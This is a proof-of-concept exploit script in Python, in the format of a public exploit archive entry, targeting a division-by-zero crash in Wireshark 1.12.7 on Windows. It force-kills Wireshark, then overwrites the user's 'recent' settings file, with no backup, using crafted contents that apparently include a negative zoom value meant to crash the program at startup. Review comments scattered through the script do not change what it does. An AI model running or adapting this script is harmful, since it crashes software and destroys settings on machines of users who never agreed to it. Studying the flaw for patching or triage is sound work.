# Exploit Title: Wireshark 1.12.7 Division by zero DoS PoC
# Date: 02/09/2015
# Exploit Author: spyk <spyk[dot]developpeur[at]gmail[dot]com> @SwanBeaujard
# Vendor Homepage: https://www.wireshark.org/
# Software Link: https://www.wireshark.org/download.html
# Version: 1.12.7
# Tested on: Windows 7
# Thanks to my professor @St0rn https://www.exploit-db.com/author/?a=8143
import os
import subprocess
import getpass
# Build the location of the current user's Wireshark "recent" settings file
# from the %SystemDrive% environment variable and the login name.
# NOTE(review): the path is assembled by hand rather than read from %APPDATA%,
# so it only matches a default, non-redirected Windows profile layout.
drive = os.environ.get("systemdrive")
user = getpass.getuser()
path = "{0}\\Users\\{1}\\AppData\\Roaming\\Wireshark\\recent".format(drive, user)
def wiresharkIsPresent():
    """Report whether a Wireshark.exe process shows up in ``tasklist``.

    Returns 1 when the literal text "Wireshark.exe" appears anywhere in the
    output of the Windows ``tasklist`` command, otherwise 0.  The check is a
    case-sensitive substring match on the raw command output.
    """
    # NOTE(review): the substring test assumes check_output() returns str, as
    # it does on Python 2; on Python 3 the return value is bytes.
    running = subprocess.check_output("tasklist")
    return 1 if "Wireshark.exe" in running else 0
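def killWireshark():
    """Force-terminate Wireshark.exe and the processes it started.

    Runs ``taskkill /F /IM Wireshark.exe /T``.

    Returns:
        1 when the command exits successfully, 0 when it exits with a
        non-zero status or cannot be started at all.
    """
    try:
        # The command output is not needed; only success or failure matters.
        subprocess.check_output("taskkill /F /IM Wireshark.exe /T")
    except (subprocess.CalledProcessError, OSError):
        # Deliberately narrow: a bare except here would also swallow
        # KeyboardInterrupt and genuine programming errors.
        return 0
    return 1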
# Close any running Wireshark before the settings file is rewritten.
# NOTE(review): presumably because Wireshark regenerates the "recent" file
# when it quits, as the header of the settings text below states; the forced
# kill discards any unsaved capture in the running instance.
if wiresharkIsPresent() and killWireshark():
    print("Wireshark is killed!")
# Replacement contents for the Wireshark "recent" settings file.  The text
# mirrors the layout of a 1.12.7 recent file; the final entry is completed at
# run time with the current user's Documents directory.
# NOTE(review): the page does not say which entry causes the division by zero
# named in the title.  When triaging a Wireshark crash at startup, treat the
# whole "recent" file as untrusted input and compare it with a known-good copy.
sploit = """
# Recent settings file for Wireshark 1.12.7.
#
# This file is regenerated each time Wireshark is quit
# and when changing configuration profile.
# So be careful, if you want to make manual changes here.


# Main Toolbar show (hide).
# TRUE or FALSE (case-insensitive).
gui.toolbar_main_show: TRUE

# Filter Toolbar show (hide).
# TRUE or FALSE (case-insensitive).
gui.filter_toolbar_show: TRUE

# Wireless Settings Toolbar show (hide).
# TRUE or FALSE (case-insensitive).
gui.wireless_toolbar_show: FALSE

# Show (hide) old AirPcap driver warning dialog box.
# TRUE or FALSE (case-insensitive).
gui.airpcap_driver_check_show: TRUE

# Packet list show (hide).
# TRUE or FALSE (case-insensitive).
gui.packet_list_show: TRUE

# Tree view show (hide).
# TRUE or FALSE (case-insensitive).
gui.tree_view_show: TRUE

# Byte view show (hide).
# TRUE or FALSE (case-insensitive).
gui.byte_view_show: TRUE

# Statusbar show (hide).
# TRUE or FALSE (case-insensitive).
gui.statusbar_show: TRUE

# Packet list colorize (hide).
# TRUE or FALSE (case-insensitive).
gui.packet_list_colorize: TRUE

# Timestamp display format.
# One of: RELATIVE, ABSOLUTE, ABSOLUTE_WITH_DATE, DELTA, DELTA_DIS, EPOCH, UTC, UTC_WITH_DATE
gui.time_format: RELATIVE

# Timestamp display precision.
# One of: AUTO, SEC, DSEC, CSEC, MSEC, USEC, NSEC
gui.time_precision: AUTO

# Seconds display format.
# One of: SECONDS, HOUR_MIN_SEC
gui.seconds_format: SECONDS

# Zoom level.
# A decimal number.
gui.zoom_level: -10

# Bytes view.
# A decimal number.
gui.bytes_view: 0

# Main window upper (or leftmost) pane size.
# Decimal number.
gui.geometry_main_upper_pane: 440

# Main window middle pane size.
# Decimal number.
gui.geometry_main_lower_pane: 428

# Packet list column pixel widths.
# Each pair of strings consists of a column format and its pixel width.
column.width: %m, 59, %t, 84, %s, 154, %d, 154, %p, 56, %L, 48, %i, 1285

# Last directory navigated to in File Open dialog.
gui.fileopen_remembered_dir: """ + drive + "\\Users\\" + user + "\\Documents\\\n"
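# Replace the recent-settings file with the prepared text and report the
# outcome on stdout.
# NOTE(review): the existing file is overwritten without a backup, so the
# user's previous recent settings are lost.
try:
    # The context manager closes the handle even when write() fails.
    with open(path, "w") as f:
        f.write(sploit)
except (IOError, OSError):
    # Only file-system failures (for example a missing directory or denied
    # access) are reported; other errors are no longer silently swallowed.
    print("Fail :(")
else:
    print("Success!")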